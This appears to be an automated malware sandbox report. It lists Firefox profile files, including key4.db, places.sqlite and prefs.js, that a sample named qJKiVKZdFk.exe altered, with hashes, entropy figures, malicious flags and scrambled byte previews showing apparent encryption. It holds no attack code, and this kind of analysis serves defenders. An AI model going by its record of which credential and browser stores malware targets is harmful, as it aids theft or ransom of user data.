                                                                                                                                      SHA-512:21F32DDDBB68433663783E3C8A2423D12AF5E5411D479739F5DB0C114B06D0BC6FC61966B48D938774A0D18CF5DA061137CA8D1A2F905BFC50C5FE242B2B04CA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"def8.SY..{...oG......+pz.......OxG..v.5..Es..S.".E..w.R.=..D.....@=r\8..j3..f.:..[......*HFX3..B..|0X ;........Y.S..+....~-..v......[y+,..R.!pm...McJI...q..g.gZ..1..v.l.]m..3...E.L.........(..N.3#.....Sg.U.}:.4...l.J#.hFf;.7;E...0IY...WJ+...a.q!.#..>8O..IA.........%.{..PX2...G....%....8...W...7....._yqb..9.Y...w....(..R..".y.p{d(..|....gca...;.BJ...V%y..U.Q/f.vfk~..4.n..o.#1........e...K.h.h...e.&(...........e.w.&kST'.T.1.e.r.0`.a.z..4....Q.R..9.Vy.k..-.-4l....gbi.3.J...q.....q.Q.Vq...5.i.e-#z..-..X.T....x`lvY-.p.S[=... ;4.`..x....w[GQbd..^.v...d}.d,.}.&D.}.#%.J.#.`.....n.S}..H..7.a'!..#...YA...=,tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):295246
                                                                                                                                      Entropy (8bit):5.153954696608385
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:sAnwhTKUhkeLGotM+AJwy3oxliNs9EfYJB3aPAEnw5VBh:seYTVhOgeFYxltEyBUBSh
                                                                                                                                      MD5:91209E81D0A092D44A7C070E64049604
                                                                                                                                      SHA1:631FA153A184F40CBFCA5FC6853B09586796846F
                                                                                                                                      SHA-256:81502EB35F92B35871028C6112ADDA61FACE98C615EE625A22A532D381E09AC7
                                                                                                                                      SHA-512:63F973B25297B935E1A2A270B4790BA01AB3463D491A5CDAEDB2D728E0185C3B28DF2528919E798B2D33556A382456895CD61523F6C3A5C4384CC515BE4E6783
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLit...7.T.1}[x!.2O..<..b..nB...U.....N.....J0....AF........&.I.p...u.]<}...&......Kb.%.Q..&.[EC....Yr6{.F.....]}....1.}....A>.N...kQ.m{..Y(.......K>`.1...K...o....Q...ht..u.2o.(..;..|"....B..J..%K.J...k.au..)....f.4....D.v..B.D.G.[r.#T..7...H...g..@.*..8.k..S.7.u.F..;>#....gX..aAU.d....T4nn...Vz..59...!ENi{...{..x.U]........_...6...R1..j....!..T...y.!....-#..J...A...F....v......R..CH..m.@......6.H...._.z.....^CZ.}..Z.#(.?jm.0SH..s.p..._A>......#.H..zL.O....#.......:.6...%.y.jTiw.B,...^"......q-..M.....u.Z.$.?h.*.<X..Q..$V.t.$.Y..4/.h..H.=..5.&e.7.......`i3..$.....^N...%.....^.J..-..x0...t-.b..r..p....J.B.TS!......._.Z.Y.{.?..v0.3kJ.[xf[l.P.B..../er(B..e...Pcn.x...........f.#.l...[.....<..C.....k.{.".~..v.R.s..s;N...........%.Y./..$.7....S..`.6|..X.7Q1n....h...thG...q..:.[.'....j*..0.w....,N.kV....D.W...|.5...i..........8r@v4?..b.|e.....L ....S.uTt.....r.....{|.Eg.o....ZW...r..@..6.nZ_.'....u.]{~....v../nmg.D..":b.k?....kS..^^.}hQ.

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):98638
                                                                                                                                      Entropy (8bit):7.997907221976167
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:Iq7E9PS+q+UlZJUkfycKz+5fLBFtArlFF8:IDJq73JUanCrlF2
                                                                                                                                      MD5:09DDCD1C5BAECA53DA78E519BC14B830
                                                                                                                                      SHA1:0EE839CD12959E9BD870DA3522C2928E06641757
                                                                                                                                      SHA-256:5F2920B876F431295304903721BCCCD32C9268184CAA92CCAFDA9AE51FBEE8C2
                                                                                                                                      SHA-512:71D083A080D2EB70E62235850369CB87B85ABB92A60DE351754AA2B56D59F907B78DC40C1BBC530C215370F33F36F33609C8477CE81522C2357133FBAF7B7E80
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit.L.0..n....A^...lL:.m.v.XA.Q.+.....y!.e.....o...\.a...E..z9.^}f.A}....l.d....ex..@{..X[....g...6..b..k..`...y,..,..Q.T..!z.n4...E......cR..7<L.pL.s.3h.....Z9..n.;}........`........Y....^...,8CF.,.5...R8.....1....A.,.....=.5.`....u(B. .2....E9.....~...*.G..g.....F.LH...LU.^.g...;....u.h4%........!.j.....og...O9ZH..{...0.......*:.m..t...3i!..(......s.F-7.q.....H..eY.E.Y.<..L...Y..qj+).Ty."l$."..%vAV..l.Y2.3...Kd.:a..\..-"..}5!..1r...>...Lz...J..+.[....R..cc.]z........S'...;...N......U.#..jS_C(.~.P".N...1(.c`|...#f..a.CW....js..f..C.t....F..)`...w0Iom..l&....~.H..T[.......G*R...i....B.u[.uQ.+..2.z3.O....Ef..H.>Tm.p..tBH'&n.H...g..).......H...o.0[.D.......V.......cL'Hzg;D..~..>k.c).......s....2.%..s.E.66D.N..o...(.7........B.....\|....L.[.w...\-....A..}..Z.-.`p....St.+<.ia#8...f....n ~.&.L*..3p.B.k....1l...'|.].#.L...$..;..e...5(X..p.. .(...D..Es\l.y..........(.h..=.]?.._nl.#.)v..hL<7..]$..w..C^1..>C..e....B.@.9....*zP.........%..M.q...

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):851
                                                                                                                                      Entropy (8bit):7.736913293399545
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FVlv3HaD4xUV76x0OoyqIotHzJfiB0miquQOZbD:Ff3a0xN8yz2H1KB01qzqD
                                                                                                                                      MD5:C726EC606B402212DFE6D9CE559F0568
                                                                                                                                      SHA1:A5763EB0315025B3E5171FD616B7C6BB295AF3E8
                                                                                                                                      SHA-256:A3E8C89F62230285C35F6659C42FE8DE5AF97160F0A63CADA3647DD0831C2B06
                                                                                                                                      SHA-512:590FAA35A571840E981FFB113E24E88E1C76947A716AF2FA2C1B5A5FD94B92373443E4290F59E301781A416E9AC311E6180E90DA1BBDA9230296F7FFAC9B7553
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:libraa......R.di..cUk....u.v........b+..$fv.b%..0P(.}..K.......=.d.._..Q.X..8.g...?+!..t.y..&...3...0...].X.-!..^uEq.K.NU..e.../.l.*r`..|..j.G..j...q.;5...F1....h...D9..G!.;..?.DI+....l.....g6.T`7....p.._)_.........V.]..$.R.N.y"........x..s4..)QJw.i:.&._...N........z."..=H]4.3P..V.....k)}.....E.Q.O}.*j7.......a..H-}5.....#%W.....,.-....|.E.{...Q.X7....5}..Pk.&....Q.?.4..g.V{.w.....P..^i..`.....;..i.S.7..].....}...X.....C&...I..I............6.._..<..CH.;j.........<.....f.Y.<...:..P.W...'..l...........f...........F..d...W-K.L....D5.6.7u..L....M:a......4~..M.e.nBL.<;.M9-mV..OU..CIy..D...d..d>-......8r..h.y....!42.........`|.....-..T...u..v.1.K.3...%.h).(...6y......:.-!..L..M/;........IKl..zag?+...06...Q-D.....r_K.Qd..I...$NPqtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5243214
                                                                                                                                      Entropy (8bit):0.4321028363964776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:MLt7q3L6aQLGOiGmilWtoFTU76Wbi0nkZo5QwhYXLytyebYywF:MLVq3L5QcZcWtoFT9V6kKWaYaxkywF
                                                                                                                                      MD5:A20EED865EFD9AE45CFE43207F7FDB66
                                                                                                                                      SHA1:9C111662269072614D9BBACFCFF89F682F22946A
                                                                                                                                      SHA-256:66A3367BDD540ABCD65DEE116AB9B517C549FC0CD52450E794613A253A68A18E
                                                                                                                                      SHA-512:D52119296C0B7DB24B110A517ADCCD14530029E22D1477798B0DD982354B3BA9E034786685323CAA8A567B8F35F48DF5F83526879D1C69E34B616D90D66EA3BF
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit..........#..z..@.....6....Z.1.....Y....F.j.b.....h.7..Q2.....T.Uy..Z*........ ..:,=M.C*.r..FX.V.vi..G^.0.HZ...uM..m..b...<..O....@....r."..=...W..22.@ ..sG6B....dd`A.Rf..:....m...q4........(Y/$.........^.@)..R.=.........p....sB.....3;e....x..X...f...Tpv...:....0.^....L.)...x..Z...F......(......1h..J.C....H.M.R.z..Wpmv..S..:.mysy.....uKuK.W..l*..}fTb............<p.7..+RT~..?.}.S...mIW...e...5B+.t.UF\..T8...D.B9.q.hd.;-Z..S.....=..*H(...R.6(...........2:.N....k{..2=...P.@..p....E.3OS\.......4C..3 /..(..X...8.)6.;.....rY...!. W..;=C...GP.h..t,.w.E.....M..d&.0.L..e~...p'....M.#)..F.._\#.+...(".J.8.sK.+A..y.*Q.X.y.t..mg..ky.w....s....6+.........{....o.7..4C..^...O.u..I..P...kC{....gm.se......p.<cAe.....:....."/GPb.....N74.....y2.......-..7........6.HM..{zgA.nq..!My.o....I..s7l..nl`....x].t.m,.+........,.......g.........8US.@7...j....%7..X.m..Bh.X..0.?8.&..#~Hp....c.B..n]....:..*..?Cs......k..1rw.0...@.I.A".....+hp..&.......P`..o1

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.994505135978203
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:ZE9XjmZhcAxbhErPUh32aTkSVAyaN0B2DufCb+IbSWAHHTnz:i9KZh5bhEZaTDAyT2DEIbVUP
                                                                                                                                      MD5:DB220BB7A2C5366D720C1D2E9992309D
                                                                                                                                      SHA1:57D5419F6A172698E88C2A0EA0BC9502C6A53DD1
                                                                                                                                      SHA-256:6CF32202F55EFEA48ECD56486685F3278D4278A5B84BC25BD0661BF2669814E7
                                                                                                                                      SHA-512:6C96DCFECF040E4111C46315960BCCEC231F5D12A157B9B2CF57EF9D53B78270572C423D34554235EF55C97CEFC1153544914681209F796CA657F7766A6E4A4D
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:..-..[PB.e..L...D!.....\....o.I.(.c..c....."....&c..E......v#8...`fa.....Eo..=xx9....D<.iR)*.......:..|..AA_.B....O}F.4.lG..ah....`~.\..iK.Y4.Z.~...|PJ-..^.....6.Q..Z.s@.....%.J. qq.-.......ZY'....Wp..5.kV.<...WT...f....W.L.....f^.`...^.(..x......:..,[......gJ..m......~^.."..-.}80..;..`..N....$..Y&......Ib.`.Z..c*.WS.=y.../...An.@y..T9.f.T......O.}.........~..........'.Z............]..w..qh..Iq..o!-.^...W.w)~...(....P.*.N....R.......X.;Y..<.b.,.h...e.2JKj[.].^. Z<!.W.w..XW...[.;n4.Q.Y...?I...gt...!.y...*....n..*.. .!.......Z2b."./......_,....mN.....b..K..X=.....6.....<.3....../.C:<R.=.]....TCg.aVD.?..=-.H..z.G.".5.G.c.r)_...4.`.R....D..DO.....<&.....!.......-.4......Z..B+D...k+d;V.;38I.-.5!?..=Z..Xcn..(\.p.I.cg!E....uon.).O=sh......P....4.D.,.2..*..`..O|.rJ....J...8!...E....#...y..(N.~i.....G..M.'.\n....-...y.D.r.BDl.P.M...1.O.....C.b.....{....L-...._K(..Et..v...:r9$g.E...H.;..+E=...GG...qq....&p.)*...I...TF....K..G.._..O.c.YC.....M....b.

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9905
                                                                                                                                      Entropy (8bit):7.979248196568117
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:esgJgJRjvgXoDb7wQFifySh1oXUJJHKkQF1O0kxi++Zp8vUzpSWL/C62qOdexkJQ:C2vg47wQkfyO1oXUnUb9np8vSpG62qBB
                                                                                                                                      MD5:3E4344A5BD1AE3407E18D1F827510C87
                                                                                                                                      SHA1:8C30371ABA4C0C8952F228BA11CFC37ED0BDFB7A
                                                                                                                                      SHA-256:5EFC99F1A6FFD42E0CC600DD44BC1A9D0AC04462620F35980D53E63FF94C6A34
                                                                                                                                      SHA-512:A23DCA50CC5A203D8C4B04B17CD7B4385593D126381E5203B7D345B91B19A754E4F27017EA92A1499F3D3FB634DDF34AC1DDAE5F2E10D40DCE9DEAC4D8629F6E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:// Mo&.k....V.......7....e....`.o.o./...t...8.O5-7..S..).`.\U...NA..n.a..;fMa|k.......,#.K...l..:..<...M...?....Rm.....A ..6.id.9U....j./K..E.5.....V.>.........~.*...+...$1.M...N&..l.....\.>C.*=....!..2#.....u.G...T..B.S.A...1..(.-...rz.........>..(.p....m.Du8..L&...y;.%.V........N....2..a@&/..1......{..U....E...kj}.t&.p.i}.}..4U..W...hN..0QN.r0..s$"...=..x....z*.O...J....4.s..16....Ye.....*.%.-.J]....%..<..X.... 5.n.#.G..O.....p.PN..U./_ ..B.9?@X...&0.a..P.8.@D!Z.{.....t..d.o.y...$.0.....J........Pk....'W...pp.;...Y........*..BhM6g.....P$..%.l.....k.{..Xi......G..i...A.....h.J.j.....^..&U.......}..Z.p...P>'.7.....f.T.X..[u..E_......s..B]Y._.)..+>..uv..d...D...]..j%n.x.7b..0.m.}A.o..i..' .7SS.1.G.k!._.hA.....' ......W.e!..2r..z".zB..vg....J....D.n...Q.wp.......Pu.o?.r.9.....s.0k..2#8.W .{*..._J...f.n....\.@.8.... .Q.T....^..x..x.......\..d.a.%C.%.....l.E.V.....,.`;...wN..?...9..4.....v..K.U...+.....4.j..A.e....3.T._g..mO...8.2%j..f..

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65870
                                                                                                                                      Entropy (8bit):7.996991348480303
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:FL0drJ9IoQ8xmcx+R1PeeSTECMCsVjVntkrX:SdrJ9LQ8aPqTECFs3tO
                                                                                                                                      MD5:578544E04D62D9475868188C8EC9C3A3
                                                                                                                                      SHA1:7422F4F0EEA99AFB021C2ADA001B0916DA8F4FE6
                                                                                                                                      SHA-256:8C5BEFB592D5061FB9FEA94B39E299E5068B957F7B11D71C4DA165C4F7D7A54F
                                                                                                                                      SHA-512:4E0A373A46A3DD3AA3FE9CBB75FBCECCA76F3430D9956BD68270A91DB97ED15E2821713521C2DF303A28915BFA0222C1D412844571165DCA383C47912063EE57
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit.l..........o....Qc.x.D3..>$.p.V....".9N..G....[.@..T...Dme .'..B.....hr,.)..Q@|...Y..0|p.+.....F,ZX.3..5ET.Y}....Y....|........."...G.=.YA8...x.\w......M.._.....9.....S7.b........q7..n...2.*j.'....IveY...?b.9..bs.4V.....5C.H......8...(b.{..B*.Ng<J..a.w..LWU4.......9&.,.t.^.>)..UI.`?...JR.....3gl.MO....0.ga[4...[..J...0..b.@.^..#..2H..y..l.)..~...~....6.H.]...q_cVJa.A'Y....,8...4..c..T.....q..f ....\.~m.E......z.^~.)..J.S......G.E.?.K.....6]Q{.....X_._.A.....f..S(..y=9.S.....J....n..t.............#.6...8..O.G.f..@/..Z....s.k.H...b..A!9E.X1..........$.zm.&.....6...W9*.fLe6.4..oh..W..v.;...8B.W.U.."t...l..<.ybs.....X.8..........."8fu&G.:..h..4QO1&IH..{.]F..&..2%.$..G.I..&..._2....ZX.d......~.m:M....aS..>.y.t...NP..7.XC~U.....m.....%..U..$..b....o..FE.`.'.q..b...+..bHW1...9.i..P.0...t...t.cm..VN.....].DL.-.%..LH.u}).$xo%..Db.........i...5A.!D...U95;A.......r>..!G..k).}.............!\..h....w8.....g.{....V.....CsW.93.W.!....G.:..

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):683
                                                                                                                                      Entropy (8bit):7.689160979057765
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:JB4BDoLzpdh0cOWC4jdAZTSySJgbTxRLlK9bi4XzaegKW/JknukIcii9a:J+CLLWjWC4jdAZOaBp49Bza8xMbD
                                                                                                                                      MD5:49DDE18BA6D7529D8CA5A32CF10AE492
                                                                                                                                      SHA1:0AF143A6E072460F807223EB81D7E95EDDFC9834
                                                                                                                                      SHA-256:0E1467A6FA97F664690632034FD655D5621A4CF1E335130E93BB1CC4E4F8EA65
                                                                                                                                      SHA-512:6A67E5E84C33B8F0E303458827A165D07DC64946C869503FFD4C8BC3BCC13F5FBE5E9A938E3A54FA23238FE5E4FCC035F95ADBB30FBD3319C80F046EEFB494FC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:mozLz^v..j.Fy......\#..y..&..\...E..CW.m.t..i...pK{g..v.lz.......[...N%.yy.W......%...o.N...Q[u...F......KM.......vqsva.f.....9...I..6..a.+.\5.'.x...(z..RA.To..........#..s.%..X..`.8...U....b.F._.J.. ....T..130+...?.{e...ji@..*.J^.RW.d$..h.).h..*.!4.l2.s.......H|...B$LH.;}......D.<..g..gi{@.?O......-;.O.H].n.ee......U.yh..,..W(/n*n.H../..O....H..r..|i.....o.....b.p..Q.m..:.B.i..y..v.3I.=.g....pZ.f.0..'.....z.p..8....t`.M..=.|).hb...p.........'..w>...../t<G.......UW?..g.K.........Nb..A...;#.>2.).|\i......G....Z8Z..~....H....Yj...<..,..RX.z.s._K.Iu.....zy.'...>7...D5F.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):622
                                                                                                                                      Entropy (8bit):7.592826447219331
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YoB/hKX6eTDdbfkZ+ZMyGc1lAKU/RO9Gw+cw4faEPAuukIcii9a:YOcX/RK+ZMyGEllUUD0JbD
                                                                                                                                      MD5:2BDC3FD6E231CA52CC7E216FE98F3238
                                                                                                                                      SHA1:2AB7B7C2015F60F7F09D945A109B7241662A8609
                                                                                                                                      SHA-256:56DCC409687259388A4CE46C95BF2FB3161032EBF26500664ECC0CD5BE29381F
                                                                                                                                      SHA-512:86155C0CBB89B40C057A4D4D3185A3767150655AD2A7680F4624237A846900D53F86EDDFAC3B90DCCCC7ACE8B6CD7E741FE0AC2DE81B69A439628799FB008DEF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"pro'...a.8..nj.@...d....L.4."...6..D....h..8.;.ia.w.[.1..JZ.H.I.r..IVR...~...u[..+7..E.[c...pS..P..|ky..A.,l..R..j......O...G=.Cp....[...hm-.9=K....O#..F..X.....+O.z..M.....'}....Q.......SjO..->\..F....z.........X.B..|....=.....iQ........N..&...l..a...T{i...7y..>.F._j+Ta.a..i!.....x.8.,..&Y.p..r.v.O<...C...cX.*..i|..>.6...&..O.~.=. a..T....-N.6.&..r.X~...._....`h].>I........;l.$@..ST#...L.7....... ..L,...<.TI......0.>o...+..x-.X..Wp..x..C+I`P..d...3i.......Jrw...v...DwnN^.M..l..N...:(,.^..7LGJv.+.\6.}..<.U.2..;..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1552
                                                                                                                                      Entropy (8bit):7.863792607802671
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HHRupUtNT6INNsCux80aYe7Miu0HsVJ9wUaCvMF0y/DOScnJpQ5Z6B1MbKwJHoJX:Ru66INaCh77TdMVZaLD/DOScnem1HpD
                                                                                                                                      MD5:08D50D20B64686667DAD36F5D2ED6530
                                                                                                                                      SHA1:8F645ABD1DB76A5869D0E66DD4966FA174B72FFB
                                                                                                                                      SHA-256:0032AB1FB3487DB61A3A7E8BC8D217A36C601E51172A4469469FFEC07F647C0C
                                                                                                                                      SHA-512:5C13B575AF4562E2E80D7ABAA98FB962B58E105DF8F13478EF8F3B69E3A085B746B4C8FC46773840048C831738005FE8BD5861C6A4C731A77B839DDC760F4F07
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:mozLz.;.....f....U......|....U...g'U. ....|..d.>.~.k..*9C...%.8....2..$+L+..oY...M&iqn.yMb....t...f5.Y...."W.)*+\.. #.)..u....q..|.v..\(A-..OO...w.1K.\.f.f?.L..g..N.y..s...N...-zy.Mmb....4..:'.....L.S.Y....==.F/...b.?zU...d?E....0|..2....H2^...b]x1...K..Ic.H.?....+.L..p$.v..W.C..-.E...'...._...W...O.zl......oX..}..@.....".S..qJ...-z......x..[f.k ..y.s....[b../.= .....-...3..&.3.A..2{..W&......w(.S.e.b.!.7-CG5.f.i,.H.)..B......Ody......s.?...G.i..C..7.Jm.....%...5...Ob....h...'.1...:5./.X..2@3{'.........v........p..[y....B,l....+u...^....O....tm....."../....,z.r.. ...$.....IT...K9$......%R.'.RW...3_.Nz^`....]......P"..:.i.KG..v~/ 9(.....@........R.>.C=...7!.IG........m..x..o.'.a.....l.D.O(u...B[fx...I:h.(ir]0..f....<O7uw.[M.W......l^.N...]a..+uM(..E.y.-....V....G.r4p.......W.....9.K...J......FzU.Vvai..PW.9....1.......D.....p."bK....q.............#7.a..6...4v.N...X.R.>...j|.<.Z..@6...7...~%.<52.`^......1..S.....}....C..&-+..oH....[..

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):352
                                                                                                                                      Entropy (8bit):7.342071534967308
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YAzgDETYgPfB055bJZ9uu5fbeM5QNSJC/aa4jZQU92uT3nMTWVlVELsPc+BL43uV:YSPT0RJZJn5QkJC/sWUQGnJlVHJLYuk6
                                                                                                                                      MD5:A1C870884B4DEA2E4BEEF85230EBD70E
                                                                                                                                      SHA1:09BB421275ED350404D22A0F31FD06B0DF6B3CB6
                                                                                                                                      SHA-256:2C48AB3BE66C83676A9B413967F98074A8C0C3BEBE2390271C256DD30769BAD7
                                                                                                                                      SHA-512:FDC5705EC203E960021D21BA513C827D70534E6C9BF732C7129C646D34E775888D78777B1F173A32EFE6A4B295A57D722A518EA976D78F9EC1D0A0BEA31A08C8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"expD=..$.IbTfHr{6..qqm..!....#..O...........>5..#.U...K..E..gK0.L..^B.o..rz..[..u...C...R..mSM.0.}.=i ..9..W...F.q...au..,>...Q.C-L.._%.`..N..1..$..(....I.$.|..q".n.-....7...1........U....kn)...~.9.!'...v.a.......S...y....^..._....E......U....."c......{.0.$R...qtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4430
                                                                                                                                      Entropy (8bit):7.9547675995088865
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:HfWiRwkFBn3cfKXacII33GVyOeriL0te2qhQzOViSAqzo1BQ:PBDact33aReO+e2qOyMozd
                                                                                                                                      MD5:A1A3930B926461AEFF08AF26FD15D76D
                                                                                                                                      SHA1:49C2A2335F08BAB5D8C4B816108581428E4309D7
                                                                                                                                      SHA-256:0F3CE6907A95C4753F048E582BE0840F5F03C16EA14C9483F56B13B019CC1DC7
                                                                                                                                      SHA-512:35E0FF70C066A2F08B1017EDF16656C4E6CD0E4B9F65C4E47959E8E1DDC3A923759BFF53F7EF85B7FABCD4A5D5818D617B5A4FDB2A4F8F190B00DEA33C88CF74
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLit.......>...C[..r.=..;.NyU.Q%[.z..R$.1pP..8..u.@..S........>.-B...E..n.Pho.Q.J..p.....J7.x.,....1...[...Gp..W}.OF..I...s...Z.J.1O{3.{.y...E.F..|Q...2..Fyt8Z.$q.?.*.=As.Y....x627.\.<Iy...M.9..K.#..C./.P.....=...?.c.x` 7M..[..P"OF.SPSxt.FAv..........!.u..<......&[g.G.J^...n.UI|pE.UG...5CK.....<~....Df:.."..<...^..fe.. .`.v.m.). ..q.....t..S.....a...>].&.b...M....)....?!.......8D2..J.].>..R4.DvL..;.^.#.|..........}...P.x.."..pm.}...}.+.ZG.=..}.K........R..&t}....nu...S...3...(s..~<.4..+.%H?.vark.cq....[.B6Z4......P.Ey.-.iR......r2o....:.W..__.....`..J0......Y ....,.R.l.>.O..... ..+..(!d.@..{.?..".......,....A...z u.....d.....s./....@...h......+(.....P..dN......|...\C\\...2......8..x..............$.:N6Y/.....]w.......$<........^.*..Sd<.K0.n...L.l..........Vd....gT.b9......v.../YQ2.....s.<..Q.k".v.F.....,.n.2......OF..j...Agl.....b.+...I.?{L..B.....JP.z.$.4.^..$....[..FVN.>..F.X.....!.Zk...6.7t..3.%>......tz..dN=..t......N-7..?.

                                                                                                                                      C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4021
                                                                                                                                      Entropy (8bit):7.957556112699653
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:0DcrTm/yci/AoA8FraVMbj/5l6rHB28s5QSdhL2N9aDcW1Y7Va1h/:4cu/c/AA6Mb9Uh28OT/LFDPX
                                                                                                                                      MD5:2306413FAA13B8EDDC70A2516F1F4D24
                                                                                                                                      SHA1:F52D9207C9F44AD84C6D2EE27E87986FB7D0581D
                                                                                                                                      SHA-256:83E767E2FAE08BACA83CF750FF678BA44B0BC09D4CDE1AD984267EBD4A070775
                                                                                                                                      SHA-512:FB1987F8F8A1684A8BDC4C8CB64BC63CFB609D8ABA0EE824DE374B467E0C56A3929784B32FFF0AAF33A1DF6A438CCEC31D841664BDE2E7AFC5A68E03787D3E06
                                                                                                                                      Malicious:false
